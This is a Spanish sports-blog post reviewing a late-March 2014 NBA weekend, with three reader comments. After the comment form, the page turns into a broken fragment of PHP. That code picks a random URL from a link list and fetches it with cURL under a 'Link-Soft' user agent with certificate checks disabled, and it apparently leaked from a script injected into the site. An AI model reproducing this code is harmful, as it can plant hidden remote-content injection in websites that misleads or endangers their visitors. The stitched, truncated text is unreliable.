Informe de fin de semana: Memphis en el agua

31 de March de 2014 por TheDeerHunter

Repasamos lo ocurrido durante este fin de semana y comenzamos con el maratón del viernes.

El batacazo del día se lo llevaron los Pacers que volvieron a mostrar su pésimo estado de forma esta vez en una complicada plaza como es Washington. Los locales no necesitaron estar particularmente brillantes ante la pájara ofensiva de George y Stephenson. Tampoco ayudaron las 17 pérdidas de los líderes del Este que parecen empeñados en regalar el factor cancha a los vigentes campeones. Éstos, como comentó Denise, se “pasearon por Detroit sin Chalmers ni Wade” aunque con triple doble de LeBron. Los Pistons ya eran calificados como el “peor equipo del año en relación calidad/rendimiento” y eso que aún no habíamos disfrutado de su “machada” del día siguiente.

En el resto de contendientes en la conferencia encontramos resultados dispares. Los Bobcats tropezaron en Florida en la prórroga contra un Vucevic desatado; los Raptors aseguraron su merecida presencia en playoffs doblegando a Boston en un choque dramático, con susto incluido de Lowry y palmeo in extremis de Amir; los Nets mantuvieron su solidez como locales (12 victorias seguidas) controlando cómodamente a los Cavs. Por su parte los Bulls, a pesar de la abultada derrota en casa ante Blazers, también lograron su clasificación matemática y los Knicks… “Otra debacle, esta vez ante los Suns. En el descanso ya tenían el partido perdido yendo 22 abajo. Lo Suns cogieron 19 rebotes más que los neoyorquinos.” Denise
En el Oeste lo más interesante fue la victoria fundamental de los Warriors ante Memphis, impotentes a la hora de controlar a Curry. Durant ajustició a los Kings con 29 puntos y sigue camino del récord de Mr. Jordan. Los Spurs a medio gas le endosaron 133 a los Nuggets y los Lakers se llevaron 143 en la mochila de su visita a Minneapolis con Love exhibiéndose con un triple doble. Por último los Pelicans pudieron con los Jazz a pesar de la temprana lesión de Davis.

El sábado hubo mucho menos jaleo. Lo más noticioso fue la victoria de los Sixers que se libraron de batir el infame récord de 26 derrotas consecutivas. Pudieron hasta gustarse ante unos Pistons que están pensando más en las vacaciones que en otra cosa. Los Heat cumplieron fácil el trámite ante Bucks y los Hawks volvieron a palmar en Washington. Unos Rockets sin Howard no pudieron con los Clippers a pesar de que Griffin se retiró pronto con problemas físicos. Además el viejo Doc mandó a los vestuarios a “Big Baby” por quítame allá unos problemas disciplinarios. Sin embargo se inventó un small-ball con Collison, Paul, Crawford, Barnes y Jordan que funcionó muy bien. Con esta victoria su clasificación está garantizada.
Finalmente no pudimos disfrutar del Duncan vs Davis por lesión de este último y los Spurs lograron su 17ª consecutiva sin mayores problemas.

El domingo tuvimos muy buenos partidos y resultados interesantes. Los Grizzlies caían en Portland y se quedan eventualmente fuera de postemporada. Aún tuvieron suerte, pues los Suns se la pegaron en el Staples con un partidazo asombroso de Kaman.

En el Este la octava también sigue en el aire y los Knicks dieron un paso de gigante gracias a uno de esos partidos tontos que se les escapan a los Warriors. Por su parte los Cavs aprovecharon el apagón de Indiana para mantener sus opciones. Vimos los 31 de Durant ante Utah y los 33 de Augustin en Boston en el partido de su vida. Terminando, los Nets doblegaron sin grandes problemas a Minnesota y los Raptors ganaron en Florida.

Comenta

3 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Otra pésima decisión de Curry en los momentos finales… supongo que algún buzzer beater o winner tendrá, pero si no lleva 6 pérdidas en los últimos 40 segundos de partido con +/-3 puntos de diferencia, no lleva ninguna…

      Citar

  2. Esteban dice:
    #2

    quien dijo q los PO del este iban a ser aburridos?

    vamos q con el mal momento del heat (sobretodo con las lesiones) y el pesimo momento de Indiana

    quien apuesta que ambos conjutnos barrerian a lkos entonados Raptors y Nets

    ojo, tampoco para esperar una final diferente a la que todos sabemos, pero jugando asi nunca se sabe, lo que si, dificilmente veamos al Heat y a Pacers barriendo en semis…

      Citar

  3. Nacho dice:
    #3

    Txusma,en el mail te dejo el análisis del Oeste.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>